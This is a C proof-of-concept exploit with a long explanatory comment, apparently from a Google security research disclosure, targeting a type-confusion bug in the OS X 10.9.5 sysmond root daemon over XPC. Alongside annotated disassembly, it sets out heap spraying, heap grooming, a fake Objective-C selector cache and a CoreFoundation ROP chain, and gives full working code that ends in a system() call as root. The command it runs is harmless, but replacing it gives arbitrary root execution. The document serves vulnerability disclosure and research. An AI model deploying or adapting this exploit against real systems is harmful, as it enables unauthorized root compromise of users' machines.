/*
  Source: https://code.google.com/p/google-security-research/issues/detail?id=121
*/

/*
  tested on OS X 10.9.5 - uses some hard-coded offsets which will have to be fixed-up for other versions!

  this poc uses liblorgnette to resolve some private symbols; grab the code from github:
  git clone https://github.com/rodionovd/liblorgnette.git

  build this PoC with:
  clang -o sysmond_exploit_writeup sysmond_exploit_writeup.c liblorgnette/lorgnette.c -framework CoreFoundation

  sysmond is a daemon running as root. You can interact with sysmond via XPC ("com.apple.sysmond".)

  sub_100001AAF calls sub_100003120 passing the xpc dictionary received from the attacker. This function
  allocates a sysmond_request object and fills in fields from the attacker-controlled xpc request dictionary:

  ;read a uint64 with the key "Type"
__text:0000000100003144                 mov     rax, cs:_SYSMON_XPC_KEY_TYPE_ptr
__text:000000010000314B                 mov     rsi, [rax]
__text:000000010000314E                 mov     rdi, r14
__text:0000000100003151                 call    _xpc_dictionary_get_uint64
__text:0000000100003156                 mov     [rbx+20h], rax                ;rbx points to sysmond_request

  ;read anything with the key "Attributes"
__text:000000010000315A                 mov     rax, cs:_SYSMON_XPC_KEY_ATTRIBUTES_ptr
__text:0000000100003161                 mov     rsi, [rax]
__text:0000000100003164                 mov     rdi, r14
__text:0000000100003167                 call    _xpc_dictionary_get_value
__text:000000010000316C                 mov     [rbx+28h], rax
... continues parsing more fields

  The sysmond_request is returned from this function and passed as the first argument to sub_10000337D:

__text:000000010000337D sub_10000337D   proc near               ; CODE XREF: sub_100001AAF+4Bp
__text:000000010000337D
__text:000000010000337D var_38          = qword ptr -38h
__text:000000010000337D var_30          = dword ptr -30h
__text:000000010000337D var_2C          = dword ptr -2Ch
__text:000000010000337D var_28          = qword ptr -28h
__text:000000010000337D var_20          = qword ptr -20h
__text:000000010000337D var_18          = qword ptr -18h
__text:000000010000337D
__text:000000010000337D                 push    rbp
__text:000000010000337E                 mov     rbp, rsp
__text:0000000100003381                 push    r14
__text:0000000100003383                 push    rbx
__text:0000000100003384                 sub     rsp, 30h
__text:0000000100003388                 mov     rbx, rdi          ; sysmond_request pointer
__text:000000010000338B                 mov     rdi, [rbx+20h]    ; "Type" uint64 value in the xpc request dictionary
__text:000000010000338F                 mov     rsi, [rbx+28h]    ; "Attributes" value in the xpc request dictionary
__text:0000000100003393                 call    sub_100003454

  this function extracts the Type and Attribute values and passes them to sub_100003454:

__text:0000000100003454 sub_100003454 proc near   ; CODE XREF: sub_10000337D+16p
__text:0000000100003454                           ; handler+C0 p
__text:0000000100003454                 push    rbp
__text:0000000100003455                 mov     rbp, rsp
__text:0000000100003458                 push    r15
__text:000000010000345A                 push    r14
__text:000000010000345C                 push    r12
__text:000000010000345E                 push    rbx
__text:000000010000345F                 mov     r12, rsi          ; this is "Attributes" value
__text:0000000100003462                 mov     r14, rdi          ; which was read from the dictionary with xpc_dictionary_get_value
__text:0000000100003465                 mov     rdi, r12          ; meaning it could be any xpc type
__text:0000000100003468                 call    _xpc_data_get_length   ; use "Attributes" value as an xpc_data object
__text:000000010000346D                 mov     r15, rax
__text:0000000100003470                 mov     rdi, r15        ; size_t
__text:0000000100003473                 call    _malloc
__text:0000000100003478                 mov     rbx, rax
__text:000000010000347B                 mov     rdi, r12
__text:000000010000347E                 mov     rsi, rbx
__text:0000000100003481                 xor     edx, edx
__text:0000000100003483                 mov     rcx, r15
__text:0000000100003486                 call    _xpc_data_get_bytes ; use "Attributes" value again interpreted as an xpc_data

  the xpc_data_get_bytes call is the interesting one:

__text:00000000000114BE _xpc_data_get_bytes proc near
__text:00000000000114BE                 push    rbp
__text:00000000000114BF                 mov     rbp, rsp
...
__text:00000000000114D2                 mov     r14, rsi
__text:00000000000114D5                 mov     r13, rdi
__text:00000000000114D8                 cmp     qword ptr [r13+28h], 0FFFFFFFFFFFFFFFFh
__text:00000000000114DD                 jnz     short loc_11515
...
__text:0000000000011515                 lea     rdi, [r13+28h]  ; predicate
__text:0000000000011519                 lea     rdx, __xpc_data_map_once ; function
__text:0000000000011520                 mov     rsi, r13        ; context
__text:0000000000011523                 call    _dispatch_once_f

  here, if the value at +28h isn't -1 then our xpc object will be passed as the context to __xpc_data_map_once:

__text:00000000000028E9 __xpc_data_map_once proc near           ; DATA XREF: _xpc_data_get_bytes_ptr+1Fo
__text:00000000000028E9                                         ; __xpc_data_equal+46ao ...
__text:00000000000028E9                 push    rbp
__text:00000000000028EA                 mov     rbp, rsp
__text:00000000000028ED                 push    r14
__text:00000000000028EF                 push    rbx
__text:00000000000028F0                 mov     rbx, rdi                   ; controlled xpc object
__text:00000000000028F3                 cmp     byte ptr [rbx+48h], 0      ; if the byte at +48h is 0
__text:00000000000028F7                 jnz     short loc_291E
__text:00000000000028F9                 mov     rdi, [rbx+30h]             ; then pass the pointer at +30h
__text:00000000000028FD                 lea     rsi, [rbx+38h]
__text:0000000000002901                 lea     rdx, [rbx+40h]
__text:0000000000002905                 call    _dispatch_data_create_map  ; to dispatch_data_create_map
__text:000000000000290A                 mov     r14, rax
__text:000000000000290D                 mov     rdi, [rbx+30h]  ; object
__text:0000000000002911                 call    _dispatch_release          ; and then to dispatch_release

  we can return early from dispatch_data_create_map by setting the value at +28h from the pointer passed as the first arg to 0:

__text:00000000000012B6 _dispatch_data_create_map proc near     ; CODE XREF: __dispatch_data_subrange_map+34p
__text:00000000000012B6                                         ; __dispatch_operation_perform+DEap
__text:00000000000012B6
__text:00000000000012B6                 push    rbp
__text:00000000000012B7                 mov     rbp, rsp
__text:00000000000012BA                 push    r15
__text:00000000000012BC                 push    r14
__text:00000000000012BE                 push    r13
__text:00000000000012C0                 push    r12
__text:00000000000012C2                 push    rbx
__text:00000000000012C3                 sub     rsp, 38h
__text:00000000000012C7                 mov     [rbp+var_58], rdx
__text:00000000000012CB                 mov     r15, rsi
__text:00000000000012CE                 mov     r14, rdi
__text:00000000000012D1                 mov     r12, [r14+28h]          ; if this is 0
__text:00000000000012D5                 test    r12, r12
__text:00000000000012D8                 jz      short loc_131C          ; jumps to early return without disturbing anything else

  we then reach the call to dispatch_release which is passing the pointer at +30h of the xpc object we control (the API believes this is an xpc_data object)
  this ends up calling _dispatch_objc_release which sends the objective c "release" message to the object.

  We'll come back to how to get code code execution from that later.

  The crux of the bug is that the value of the "Attributes" key in the request dictionary is never validated to actually be an xpc_data object and the gets
  passed to functions expecting an xpc_data. In order to exploit this we need to have a value of a type other than xpc_data as the "Attributes" value
  in the request dictionary - specifically one where the offsets outlined above have suitably controlled values:

  +28h qword 0
  +30h pointer to controlled data
  +48h byte 0

  the xpc_uuid type comes the closest to fulfilling these requirements. We completely control the 16 bytes from +28h so the first two constraints are easily
  satisfied. Heap spraying is very reliable and fast in xpc, we can easily map a gigabyte of data into sysmond at a predicable address so we can point the
  pointer at +30h to that.

  The xpc_uuid object is only 40h bytes though, so we have no control over the byte at +48h which must be 0...

  OS X uses magazine malloc which is a heap-based allocator. It has three broad size classes (x<1k = tiny; 1k<x<15k = small; x>15k = large) and within these
  it will allocate approximately contiguously (using size-based free-lists to speed things up) with no inline-metadata which means there's a
  reasonable expectation that sequential allocations of similar sizes will be contiguous.

  Our xpc_uuid object is allocated when the request dictionary is received, so what's the next thing which is allocated?
  xpc_dictionaries have 6 hash buckets which store the heads of linked-lists for each bucket. As the dictionary is being deserialized first the value of a
  key is deserialized (allocating in this case the xpc_uuid) object then the entry is added to the linked-list (allocting a new linked-list entry struct.)

  The structure of a linked-list entry is approximately:

  struct ll {
    struct ll* forward;
    struct ll* backward;
    xpc_object_t* object;
    uint64_t flags;
    char key[0];
  }

  This is a variable-size struct - the key is allocated inline. If the xpc_uuid is immediately followed in memory by its linked-list entry the the value at +48
  will be the least-significant byte of the backward linked-list pointer. Our only requirement is that this byte be 0, which is easily achieved by ensuring that
  the previous linked-list entry struct in the list (which this linked-list entry points to) was allocated with an alignment of at least 256 bytes.
  The magazine malloc "small" size class heap chunks all have an alignment
  of 512 bytes meaning that we just need the linked-list entry prior to the xpc_uuid to be between 1k and 15k. In order for the key to end up in the right linked-list
  when it's deserialized we also need to make sure that the long key hashes to the same hash as "Attributes" - since there are only 6 possible hash values this is trivial.

  Finally, we can add another xpc_data object to the reqest dictionary with a gigabyte of heapspray as the value - this will be mapped into sysmond at a suitably
  predictable address meaning we can set the high 8 bytes of the uuid value to point to this.

  At this point we control a pointer to an objective-c object and the code will call objc_msgSend to "send a message" to our controlled object, which is the
  objective-c paradigm for calling methods. Let's look at the implementation of this to see how we can turn that into instruction pointer control:

__text:000000000000117F __dispatch_objc_release proc near       ; CODE XREF: _dispatch_release:loc_117Aj
__text:000000000000117F                                         ; _dispatch_data_create_subrange+183_p ...
__text:000000000000117F                 mov     rax, rdi
__text:0000000000001182                 cmp     cs:__os_object_have_gc, 0
__text:0000000000001189                 jnz     short loc_119E
__text:000000000000118B                 mov     rcx, cs:msgRef_release__objc_msgSend_fixup
__text:0000000000001192                 lea     rsi, msgRef_release__objc_msgSend_fixup
__text:0000000000001199                 mov     rdi, rax
__text:000000000000119C                 jmp     rcx


  rdi points to our heap sprayed fake objective-c object. This code sets rsi to point to the msgRef_release__objc_msgSend_fixup structure then calls the value at that address
  which is objc_msgSend_fixup. msgRef_release__objc_msgSend_fixup is in the __objc_msgrefs section of the data segment and in lldb we can see that at runtime is has the following
  contents:

  { /usr/lib/libobjc.A.dylib`objc_msgSend_fixedup, "release" }

  and the implementation of objc_msgSend_fixedup is:

(lldb) disassemble --name objc_msgSend_fixedup
libobjc.A.dylib`objc_msgSend_fixedup:
   0x7fff91d5d1c4:  mov    RSI, QWORD PTR [RSI + 8]
   0x7fff91d5d1c8:  jmpq   0x7fff91d5d080            ; objc_msgSend

  which just calls through to objc_msgSend passing the address of the "release" string as the second argument:

(lldb) disassemble --name objc_msgSend
libobjc.A.dylib`objc_msgSend:
   0x7fff91d5d080:  test   RDI, RDI
   0x7fff91d5d083:  je     0x7fff91d5d0f8
   0x7fff91d5d086:  test   DIL, 1
   0x7fff91d5d08a:  jne    0x7fff91d5d10f
   0x7fff91d5d091:  mov    R11, QWORD PTR [RDI]         ; rdi points to controlled fake objective-c object - read pointer to objective-c class
   0x7fff91d5d094:  mov    R10, RSI                     ; copy selector (pointer to string of method to call) to r10
   0x7fff91d5d097:  and    R10D, DWORD PTR [R11 + 24]   ; mask off n upper bits of the pointer according to value of fake_class+18h
   0x7fff91d5d09b:  shl    R10, 4                       ;
   0x7fff91d5d09f:  add    R10, QWORD PTR [R11 + 16]    ; use that masked off value as an index into a cache array pointed to by fake_class+10h
   0x7fff91d5d0a3:  cmp    RSI, QWORD PTR [R10]         ; does the cache entry selector match the selector passed as the second arg?
   0x7fff91d5d0a6:  jne    0x7fff91d5d0ac
   0x7fff91d5d0a8:  jmp    QWORD PTR [R10 + 8]          ; if so, then call the cached function implementation address

  Objective-c classses cache the addresses of the selector strings, not the contents of the strings so in order to exploit this we need to be able
  to find the address of the "release" selector passed by _dispatch_objc_release so we can construct a fake selector cache.
  All these libraries are loaded at the same address in all processes so we can just find the selector address in this process and it'll be valid for sysmond.

  Having done this we get instruction pointer control. At this point rax and rdi point to the heap spray so this PoC uses a pivot gadget in CoreFoundation
  to move the stack to point into the heap spray and ROP to a system() call with controlled string :)
*/


#include <dlfcn.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/mman.h>

#include <xpc/xpc.h>
#include <CoreFoundation/CoreFoundation.h>

#include <mach/mach.h>
#include <mach/mach_vm.h>
#include <mach/task.h>

#include <mach-o/dyld_images.h>

#include "liblorgnette/lorgnette.h"

/* find the base address of CoreFoundation for the ROP gadgets */

void* find_library_load_address(const char* library_name){
  kern_return_t err;

  // get the list of all loaded modules from dyld
  // the task_info mach API will get the address of the dyld all_image_info struct for the given task
  // from which we can get the names and load addresses of all modules
  task_dyld_info_data_t task_dyld_info;
  mach_msg_type_number_t count = TASK_DYLD_INFO_COUNT;
  err = task_info(mach_task_self(), TASK_DYLD_INFO, (task_info_t)&task_dyld_info, &count);

  const struct dyld_all_image_infos* all_image_infos = (const struct dyld_all_image_infos*)task_dyld_info.all_image_info_addr;
  const struct dyld_image_info* image_infos = all_image_infos->infoArray;
  
  for(size_t i = 0; i < all_image_infos->infoArrayCount; i++){
    const char* image_name = image_infos[i].imageFilePath;
    mach_vm_address_t image_load_address = (mach_vm_address_t)image_infos[i].imageLoadAddress;
    if (strstr(image_name, library_name)){
      return (void*)image_load_address;
    }
  }
  return NULL;
}


struct heap_spray {
  void* fake_objc_class_ptr; // -------+
  uint8_t pad0[0x10];        //        |
  uint64_t first_gadget;     //        |
  uint8_t pad1[0x8];         //        |
  uint64_t null0;            //        |
  uint64_t pad3;             //        |
  uint64_t pop_rdi_rbp_ret;  //        |
  uint64_t rdi;              //        |
  uint64_t rbp;              //        |
  uint64_t system;           //        |
  struct fake_objc_class_t { //        |
    char pad[0x10];      // <----------+
    void* cache_buckets_ptr; //--------+
    uint64_t cache_bucket_mask;  //    |
  } fake_objc_class;             //    |
  struct fake_cache_bucket_t {   //    |
    void* cached_sel;      // <--------+  //point to the right selector
    void* cached_function; // will be RIP :)
  } fake_cache_bucket;
  char command[256];
};


int main(){
  // create the XPC connection to sysmond
  xpc_connection_t conn = xpc_connection_create_mach_service("com.apple.sysmond", NULL, XPC_CONNECTION_MACH_SERVICE_PRIVILEGED);

  xpc_connection_set_event_handler(conn, ^(xpc_object_t event) {
    xpc_type_t t = xpc_get_type(event);
    if (t == XPC_TYPE_ERROR){
      printf("err: %s\n", xpc_dictionary_get_string(event, XPC_ERROR_KEY_DESCRIPTION));
    }
    printf("received an event\n");
  });
  xpc_connection_resume(conn);

  xpc_object_t msg = xpc_dictionary_create(NULL, NULL, 0);



  void* heap_spray_target_addr = (void*)0x120202000;
  struct heap_spray* hs = mmap(heap_spray_target_addr, 0x1000, 3, MAP_ANON|MAP_PRIVATE|MAP_FIXED, 0, 0);
  memset(hs, 'C', 0x1000);
  hs->null0 = 0;
  hs->fake_objc_class_ptr = &hs->fake_objc_class;
  hs->fake_objc_class.cache_buckets_ptr = &hs->fake_cache_bucket;
  hs->fake_objc_class.cache_bucket_mask = 0;

  // nasty hack to find the correct selector address :)
  uint8_t* ptr = (uint8_t*)lorgnette_lookup(mach_task_self(), "_dispatch_objc_release");
  uint64_t* msgrefs = ptr + 0x1a + (*(int32_t*)(ptr+0x16)); //offset of rip-relative offset of selector 
  uint64_t sel = msgrefs[1];
  printf("%p\n", sel);
  hs->fake_cache_bucket.cached_sel = sel;

  uint8_t* CoreFoundation_base = find_library_load_address("CoreFoundation");
  // pivot:
/*
push rax
add eax, [rax]
add [rbx+0x41], bl
pop rsp
pop r14
pop r15
pop rbp
ret
*/
  hs->fake_cache_bucket.cached_function = CoreFoundation_base + 0x46ef0; //0x414142424343; // ROP from here

  // jump over the NULL then so there's more space:
  //pop, pop, pop, ret: //and keep stack correctly aligned
  hs->first_gadget = CoreFoundation_base + 0x46ef7;

  hs->pop_rdi_rbp_ret = CoreFoundation_base + 0x2226;
  hs->system = dlsym(RTLD_DEFAULT, "system");

  hs->rdi = &hs->command;
  strcpy(hs->command, "touch /tmp/hello_root");


  size_t heap_spray_pages = 0x40000;
  size_t heap_spray_bytes = heap_spray_pages * 0x1000;
  char* heap_spray_copies = malloc(heap_spray_bytes);
  for (int i = 0; i < heap_spray_pages; i++){
    memcpy(heap_spray_copies+(i*0x1000), hs, 0x1000);
  }

  xpc_dictionary_set_data(msg, "heap_spray", heap_spray_copies, heap_spray_bytes);

  xpc_dictionary_set_uint64(msg, "Type", 1);

  xpc_dictionary_set_uint64(msg, "Interval", 0);
  
  xpc_connection_t xc = xpc_connection_create(NULL, NULL);
  xpc_dictionary_set_connection(msg, "Connection", xc);
 
  // this has the same xpc dictionary hash as "Attributes"
  char* long_key = malloc(1024);
  memset(long_key, 'A', 1023);
  long_key[1023] = '\x00';

  xpc_dictionary_set_string(msg, long_key, "something or other that's not important");
  
  uint64_t uuid[] = {0, 0x120202000};
  xpc_dictionary_set_uuid(msg, "Attributes", (const unsigned char*)uuid);

  xpc_object_t reply = xpc_connection_send_message_with_reply_sync(conn, msg);

  printf("send and received\n");
  
  xpc_release(msg);
  return 0;
  for(;;){
    CFRunLoopRunInMode(kCFRunLoopDefaultMode, DBL_MAX, TRUE);
  }
  return 0;
}
